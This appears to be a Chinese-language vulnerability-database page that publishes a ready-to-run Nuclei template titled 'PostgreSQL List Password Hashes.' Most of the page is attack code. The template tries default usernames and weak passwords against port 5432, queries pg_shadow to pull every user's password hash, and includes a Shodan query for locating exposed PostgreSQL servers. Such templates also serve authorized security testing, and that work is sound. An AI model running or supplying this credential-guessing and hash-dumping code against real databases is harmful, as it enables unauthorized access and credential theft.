pgsql-list-password-hashes: PostgreSQL List Password Hashes

日期: 2025-08-01 | 影响软件: PostgreSQL | POC: 已公开

漏洞描述

Dump password hashes in use within a PostgreSQL database.

PoC代码[已公开]

id: pgsql-list-password-hashes

info:
  name: PostgreSQL List Password Hashes
  author: pussycat0x
  severity: high
  description: |
    Dump password hashes in use within a PostgreSQL database.
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
    - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md
  metadata:
    verified: true
    max-request: 8
    shodan-query: "product:\"PostgreSQL\""
  tags: js,network,postgresql,authenticated,enum,discovery
javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
      Export(connected)

    args:
      Host: "{{Host}}"
      Port: 5432
      User: "{{usernames}}"
      Pass: "{{password}}"
      Db: "{{database}}"

    payloads:
      usernames:
        - postgres
        - admin
      password:
        - postgres
        -
        - 123
        - amber
      database:
        - postgres

    attack: clusterbomb

    extractors:
      - type: json
        json:
          - '.Rows[] | "\(.usename) : \(.passwd)"'
# digest: 490a0046304402202dca4b438160b93abae5b76b5df5814c8a5aaa0a08396805476f49f98129b58702200d25dfdce66ebd2238d71a7756bf8320c97780b93b94cb63a52430105b541f22:922c64590222798bb761d5b6d8e72950

相关漏洞推荐